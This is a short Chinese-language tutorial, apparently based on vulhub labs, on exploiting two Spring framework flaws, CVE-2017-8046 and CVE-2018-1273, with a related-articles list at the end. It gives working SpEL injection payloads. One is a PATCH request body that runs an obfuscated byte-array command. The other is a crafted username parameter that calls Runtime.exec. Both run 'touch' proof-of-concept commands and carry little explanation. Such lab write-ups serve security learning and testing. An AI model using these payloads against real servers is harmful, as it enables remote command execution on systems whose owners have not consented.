常见框架漏洞--Spring

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

环境搭建

漏洞利用

1. 访问 http://your-ip:8080/customers/1

2.然后抓取数据包,使⽤PATCH请求来修改

{ "op": "replace" , "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname" ,"value": "vulhub" }


其中 new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,11 5} 表示的命令 touch /tmp/success ⾥⾯的数字是ascii码

查看是否上传成功

spring 代码执⾏ (CVE-2018-1273)

搭建环境后访问

访问users

填写注册信息,抓包

在username后加
username#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/sss")=&password=&repeatedPassword=

进入终端查看

相关推荐
流浪法师129 分钟前
GA/T 2380-2026《信息安全技术 网络安全等级保护数据安全基本要求》深度解读
安全
为自己_带盐1 小时前
安敢越雷池一步?浅尝雷池WAF社区版
运维·web安全
BEOL贝尔科技2 小时前
样本安全存储中还有哪些重要因素需要考虑?如何设置样本安全?
人工智能·安全·数据分析
卓豪终端管理2 小时前
零信任落地,终端是「最后一公里」也是「最难一公里」
安全
niaiheni3 小时前
红队实战:记一次Spring Cloud Gateway SpEL表达式注入到哥斯拉内存马(CVE-2022-22947)
web安全·spring cloud·网络安全
RisunJan4 小时前
Linux命令-shutdown(安全关闭或重启系统)
linux·服务器·安全
贩卖黄昏的熊5 小时前
NestJS简明教程——安全
开发语言·javascript·安全·typescript·nest.js
山东科恩光电6 小时前
如何通过安全地毯确保工业现场的人员防护?
安全
小小代码狗7 小时前
PHP 常用函数与变量参考文档
开发语言·安全·php
笨鸟先飞,勤能补拙8 小时前
下一个十年:网络安全正在被重写
网络·人工智能·安全·web安全·网络安全·github